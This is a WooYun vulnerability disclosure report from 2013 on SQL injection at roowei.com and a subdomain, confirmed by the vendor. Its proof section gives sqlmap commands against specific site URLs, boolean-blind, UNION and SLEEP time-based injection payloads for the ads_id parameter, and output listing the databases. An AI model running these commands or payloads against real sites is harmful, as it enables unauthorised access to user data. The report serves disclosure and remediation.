当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044397

漏洞标题:入围网#主站SQL注入(涉及24W用户信息)

相关厂商:roowei.com

漏洞作者: xlz0iza1

提交时间:2013-11-29 11:32

修复时间:2014-01-13 11:32

公开时间:2014-01-13 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-29: 细节已通知厂商并且等待厂商处理中
2013-12-03: 厂商已经确认,细节仅向厂商公开
2013-12-13: 细节向核心白帽子及相关领域专家公开
2013-12-23: 细节向普通白帽子公开
2014-01-02: 细节向实习白帽子公开
2014-01-13: 细节向公众公开

简要描述:

入围网#主站SQL注入(涉及24W用户信息)

详细说明:

#1:主站注入一枚,上次还有一处为修复注入点。
关系到贵站24W用户数据信息,还请多加进行反复测试,审视代码。
主站注入点:

sqlmap.py -u "http://roowei.com/js/ads.php?action=ads&ads_id=
68&ad_territory=1204&limit=1" --dbs


分站上次遗漏注入点:

sqlmap.py -u "http://www.cn.roowei.com/Public/comcount.php?ac
tion=up_sell&s_id=413431" --dbs


这里的跟主站用的好像是同一套程序。

漏洞证明:

#1:漏洞证明

---
Place: GET
Parameter: ads_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=ads&ads_id=68 AND 7406=7406&ad_territory=1204&limit=1
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: action=ads&ads_id=68 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,115,115,110,58),IFNULL(CAST(CHAR(83,97,122,114,102,109,99,67,83,
68) AS CHAR),CHAR(32)),CHAR(58,120,114,105,58)), NULL, NULL#&ad_territory=1204&l
imit=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=ads&ads_id=68 AND SLEEP(5)&ad_territory=1204&limit=1
---
[11:12:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.23
back-end DBMS: MySQL 5.0.11
[11:12:37] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] roowei


QQ图片20131129111841.jpg


QQ图片20131129112025.jpg


分站注入点为修复,就不做过多的测试了。

QQ图片20131129112231.jpg


亲,礼物有木有啊,呵呵~

修复方案:

#1:代码审视多加严查
#2:修复过的地方多还请多加测试

版权声明:转载请注明来源 xlz0iza1@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-12-03 08:46

厂商回复:

感谢@xlz0iza1 对入围网安全的关注,该注入是上次反馈的遗留问题,已转交相关部门处理.

最新状态:

暂无